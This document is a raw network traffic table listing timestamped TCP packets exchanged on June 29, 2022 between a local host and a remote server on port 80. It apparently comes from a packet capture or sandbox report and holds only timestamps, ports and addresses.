Jun 29, 2022 23:12:20.491708040 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491712093 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491724014 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491729021 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491748095 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491754055 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491775036 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491777897 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491791964 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491800070 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491821051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491826057 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491841078 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491842985 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491878033 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491885900 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491969109 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491990089 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492007971 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492014885 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492031097 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492031097 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492053032 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492053986 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492075920 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492078066 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492096901 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492100954 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492116928 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492125034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492137909 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492149115 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492171049 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492172956 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492182970 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492192984 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492204905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492217064 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492243052 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492252111 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492264032 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492264986 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492286921 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492288113 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492314100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492316961 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492336988 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492350101 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492367029 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492368937 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492393970 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492397070 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492408991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492413998 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492432117 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492449045 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492460966 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492470980 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492502928 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492513895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492515087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492537975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492553949 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492563963 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492579937 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492597103 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492600918 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492609978 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492628098 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492629051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492650032 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492650986 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.492670059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.492692947 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.495877981 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.495898008 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.495927095 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.495942116 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.495945930 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.495961905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.495968103 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.495979071 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.495990038 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.495999098 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496028900 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496033907 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496041059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496081114 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496644020 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496663094 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496689081 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496700048 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496709108 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496726036 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496731997 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496742964 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496757030 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496769905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496778011 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496781111 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496802092 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496803999 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496820927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496835947 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496846914 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496848106 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496862888 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496867895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496887922 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496891975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496905088 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496913910 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496932030 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.496944904 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496958017 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.496973991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497591972 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497610092 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497632980 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497649908 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497652054 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497667074 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497675896 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497684002 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497699022 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497713089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497720003 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497724056 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497742891 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497747898 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497764111 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497765064 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497782946 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497797966 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497807026 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497813940 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497828007 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497828960 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497850895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497853994 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497872114 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.497872114 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497894049 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.497911930 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498270035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498287916 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498311996 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498325109 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498332024 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498341084 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498357058 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498358965 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498374939 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498383999 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498395920 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498420000 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498435974 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498470068 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498480082 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498492002 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498493910 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498514891 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498533010 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498538971 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498558044 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498563051 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498580933 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498594046 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498603106 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498624086 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498625040 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498646021 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498655081 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498667955 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498680115 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498691082 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498698950 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498713017 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.498717070 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498742104 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.498755932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499145985 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499166965 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499187946 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499208927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499212980 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499222040 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499228954 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499231100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499254942 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499263048 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499274969 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499279976 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499305010 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499306917 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499319077 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499336004 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499352932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499357939 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499375105 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499385118 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499397039 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499402046 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499423981 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499424934 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499442101 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499449015 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499469995 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499470949 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499489069 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499491930 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499505997 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499515057 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499541998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499555111 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.499979019 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.499998093 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500021935 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500041962 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500061035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500070095 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500082970 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500102043 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500106096 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500127077 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500134945 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500149012 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500169039 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500173092 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500193119 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500207901 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500216007 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500227928 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500237942 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500247955 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500260115 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500272036 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500282049 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500287056 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500303030 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500313997 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500327110 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500333071 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500354052 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500370979 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500411034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500432014 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500453949 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500466108 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500487089 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500490904 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500495911 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500509977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500534058 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500546932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500555992 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500560045 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500577927 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500579119 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500596046 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500602961 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500617981 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500624895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500641108 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500659943 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500669003 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500670910 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500689983 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500695944 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500715017 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500715017 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.500730991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.500768900 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.512814999 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.512856007 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.512887001 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.512912035 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.512914896 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.512953997 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.512954950 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.512962103 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.512975931 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.512981892 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513006926 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513014078 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513034105 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513045073 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513056040 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513066053 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513084888 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513098955 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513108015 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513120890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513138056 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513153076 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513160944 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513170004 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513190031 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513200998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513215065 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513219118 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513240099 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513252974 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513267040 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513283968 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513293028 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513307095 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513319016 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513325930 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513359070 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513377905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513724089 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513750076 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513778925 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513794899 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513807058 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513813019 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513834953 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513849974 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513859034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513868093 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513890028 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513902903 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513915062 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513921022 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513946056 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.513952971 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513972998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.513977051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514003992 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.514009953 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514034986 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.514039040 CEST	49792	80	192.168.2.3	159.69.101.170
